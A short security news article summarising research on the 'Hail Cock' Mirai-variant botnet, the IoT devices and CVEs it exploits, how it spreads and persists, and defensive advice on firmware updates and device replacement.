Hail Cock Botnet: A Mirai Variant Exploiting Vulnerabilities in IoT Devices

2024-12-26

The internet of things (IoT) has revolutionized the way we interact with our surroundings. However, the convenience of these devices often comes at the cost of security. This article explores a recent campaign by the “Hail Cock Botnet” that exploits vulnerabilities in DigiEver DS-2105 Pro NVRs and other IoT devices.

Researchers at Akamai have discovered a new botnet called “Hail Cock Botnet” that leverages a Mirai variant to target vulnerabilities in various IoT devices. This Mirai variant utilizes enhanced encryption algorithms, including ChaCha20 and XOR, to make detection more challenging.

The botnet primarily targets the DigiEver DS-2101 Pro NVRs through a remote code execution (RCE) vulnerability. It can also exploit flaws in TP-Link devices (CVE-2023-1389) and Teltonika RUT9XX routers (CVE-2018-17532).

Upon successful exploitation, the malicious code injects commands via the “ntp” parameter and downloads Mirai-based malware through HTTP POST requests. The malware establishes persistence using cron jobs that download a shell script from a malicious domain. It also employs brute-forcing techniques to compromise additional devices.

The researchers emphasize the importance of keeping IoT devices updated with the latest firmware to mitigate such attacks. Since outdated devices, like the DigiEver DS-2105 Pro, might not receive security patches, upgrading to a newer model is recommended when updates are unavailable.

What Undercode Says:

The emergence of the Hail Cock Botnet highlights the evolving threat landscape of IoT security. Here are some key takeaways from this incident:

Evolving Mirai Variants: This campaign demonstrates the continuous development of Mirai botnets. The incorporation of stronger encryption algorithms makes detection more challenging for security solutions.
Focus on Outdated Devices: Attackers often target vulnerabilities in outdated devices, especially those no longer supported by manufacturers. This emphasizes the need for proper lifecycle management of IoT devices.
Importance of Patch Management: Regularly updating firmware is crucial for maintaining the security of IoT devices. However, for devices nearing end-of-life, upgrading to a newer model might be the only viable solution.
Detection and Prevention: Security professionals should leverage IoCs (Indicators of Compromise) and Yara rules provided by Akamai to detect and prevent Hail Cock Botnet infections.

In conclusion, the Hail Cock Botnet incident serves as a stark reminder of the critical need for robust security practices in the IoT domain. By implementing a layered security approach that includes regular firmware updates, end-of-life device management, and advanced threat detection solutions, organizations can significantly reduce the risk of IoT-based attacks.